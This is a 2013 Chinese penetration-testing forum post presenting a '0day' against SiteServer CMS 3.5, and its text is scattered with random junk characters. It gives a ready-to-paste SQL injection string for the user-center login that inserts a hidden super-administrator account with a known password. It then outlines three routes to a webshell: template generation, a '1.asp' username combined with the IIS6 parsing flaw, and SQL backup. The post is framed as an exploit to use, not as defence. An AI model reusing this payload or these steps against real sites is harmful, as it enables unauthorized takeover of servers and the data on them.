中国网络渗透测试联盟

标题: SiteServer CMS 0Day [打印本页]

---

作者: admin    时间: 2013-1-11 21:10
标题: SiteServer CMS 0Day
经测试秒杀最新的3.5版
# a9 `  x) X' y
stieserver官网:www.siteserver.cn

7 B  }+ C* K+ L( V
2 P8 h/ Y) ]6 ]) u9 e% h
, ?# `' q5 t/ M& r6 C7 ]0 N' |: qEXP:
1 J  \. A0 u9 |
- D( B+ \" V. V9 K8 s5 c% G直接访问UserCenter/login.aspx


% n& d! s- I# E
用户名处输入：

123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
0 q1 T5 l0 ]) M4 @% Z; e3 J+ ~
9 O% t' e+ m3 F' @
) z3 Z+ j- u0 @% w; Q: c! u' w
$ S# A6 i# o4 a3 ^  O; E密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。

8 @% n8 O% E+ D% ^2 e8 {

) H$ o$ V3 N. n/ b之后再访问后台SiteServer/login.aspx用插入的用户登陆
2 D" J/ ^( k6 l9 S  X1 x  `4 }
6 U% C' [5 V+ H8 H' R
& {; t. v" {  ^3 n
! y8 j5 z& C; R( ?后台拿webshell的三种方法：

一、
3 B* J8 g7 `& G' S6 p1 ?
) ]( W5 L# W: [2 n( r7 w# ?站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
8 h2 X2 m0 ?8 q
二、

成员权限-》添加用户-》用户名为：1.asp

http://127.0.0.1/usercenter/
3 M& m& ~# x' ^( [: Q
8 J0 i& ~* X1 s8 C用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell

" @. n6 X2 K5 b$ }" e（ps：后台添加用户时不会验证是否含有非法字符）
0 s: N) \3 t' i7 B4 e+ m2 x$ [
三、
3 \2 T/ m6 i6 ?
# C: D% b' W4 j6 u系统工具-》实用工具-》机器参数查看
' X6 `0 z0 H' q5 N; t5 N# K可以看到数据库类型、名称，WEB路径
, P$ y, m/ n- L, J7 f  Z# R
系统工具-》数据库工具-》SQL语句查询
% w) X2 b' o6 _3 J  r% D1 K这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2